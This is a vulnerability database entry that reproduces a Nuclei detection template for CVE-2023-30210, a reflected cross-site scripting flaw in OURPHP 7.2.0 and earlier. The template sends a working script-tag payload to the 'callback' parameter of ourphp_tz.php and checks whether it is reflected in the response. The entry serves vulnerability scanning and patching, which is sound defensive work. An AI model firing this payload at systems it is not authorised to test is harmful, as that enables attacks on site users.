Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-30210
HistoryMay 06, 2023 - 12:12 p.m.

OURPHP <= 7.2.0 - Cross Site Scripting

2023-05-0612:12:20
ProjectDiscovery
github.com
2
cve2023
xss
ourphp
unauthenticated
web
vulnerability
upgrade
patched
mitigation

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

44.8%

OURPHP &lt;= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.
id: CVE-2023-30210

info:
  name: OURPHP <= 7.2.0 - Cross Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    OURPHP <= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to a patched version of OURPHP (7.2.1 or higher) to mitigate this vulnerability.
  reference:
    - https://www.ourphp.net/
    - https://wanheiqiyihu.top/2023/03/27/OURPHP-v7-2-0-ourphp-tz-php-Reflection-xss/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30210
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-30210
    cwe-id: CWE-79
    epss-score: 0.00113
    epss-percentile: 0.44693
    cpe: cpe:2.3:a:ourphp:ourphp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ourphp
    product: ourphp
  tags: cve2023,cve,xss,ourphp,unauthenticated

http:
  - method: GET
    path:
      - "{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "barmemCachedPercent"
          - "swapPercent"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e51be3a217490c7c4de70ac04fb0b0431a51b8fac4ffa6d6639ca0e89b4e0e30022100af07b85973c4cb21873160e102defa8952df672fd3dcbe651fe48656e79e23c1:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

44.8%

Related for NUCLEI:CVE-2023-30210